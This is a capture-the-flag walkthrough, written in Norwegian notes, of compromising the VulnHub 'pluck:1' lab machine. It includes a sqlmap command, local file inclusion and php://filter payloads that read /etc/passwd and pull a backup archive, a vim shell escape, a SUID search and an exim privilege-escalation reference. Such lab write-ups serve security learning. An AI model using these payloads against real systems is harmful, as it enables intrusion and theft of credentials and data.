pluck:1 - written by chris

https://www.vulnhub.com/entry/pluck-1,178/

 • 22/tcp open ssh OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)

 • 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

 • 3306/tcp open mysql MySQL (unauthorized)

 • 5355/tcp open llmnr?

 • apache versjon og kernel er ikke sårbare

 • fant nettside med /admin.php. kanskje inn der?

 • ser at mysql kjører

 • kjører ikke wordpress ser det ut som
 • ingen robots.txt
 • fant en rubber ducky i /images

 • sqlmap -uhttp://10.0.0.10/admin.php--forms –-batch –-crawl=10–-level=5 –-risk=3 –-dbs tester sql stuff. greide ikke injecte noe

 • fant ingen morsomme dirs med dirbuster

 • tipper at det er sql injection som må til

 • prøvde med ' = 1 og fikk You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6.
 • kanskje passord eller email er på linje 6?

http://10.0.0.10/index.php?page=../../../../../../../../etc/passwd tester php-triks og hurra fant filen.

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:109::/var/run/dbus:/bin/false mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false lxd:x:108:65534::/var/lib/lxd/:/bin/false uuidd:x:109:114::/run/uuidd:/bin/false dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:112:1::/var/cache/pollinate:/bin/false bob:x:1000:1000:bob,,,:/home/bob:/bin/bash Debian-exim:x:113:119::/var/spool/exim4:/bin/false peter:x:1001:1001:,,,:/home/peter:/bin/bash paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

ser at det ligger et backup-script for å gjøre backuper enklere?

navigerer til det

#!/bin/bash ######################## # Server Backup script # ######################## #Backup directories in /backups so we can get it via tftp echo "Backing up data" tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null echo "Backup complete"

backuper alle web dirs og tarer? la oss laste ned den og se om vi finner noe gøy da?

fant private keys. prøvde ssh med alle men ingen hell. (gjorde feil her. hadde gamle filer liggende. dette ville funket)

prøve å laste ned backupfilen ordentlig

curl http://10.0.0.10/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar | grep 'jumbotron > ' | cut -d ' > ' -f 2 | cut -d ' < ' -f 1 > backup.tar64

base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup

må encode til base64

gå til edit file, åpne vim og spawne shell med :set shell=/bin/bash og så :shell

fant ingen kernel exploits

find / -perm -u=s -type f 2>/dev/null ga en exim-fil.

fant en exploit tilhørende exim 4.83 https://www.exploit-db.com/exploits/39535/

whoami root

results matching ""

  No results matching ""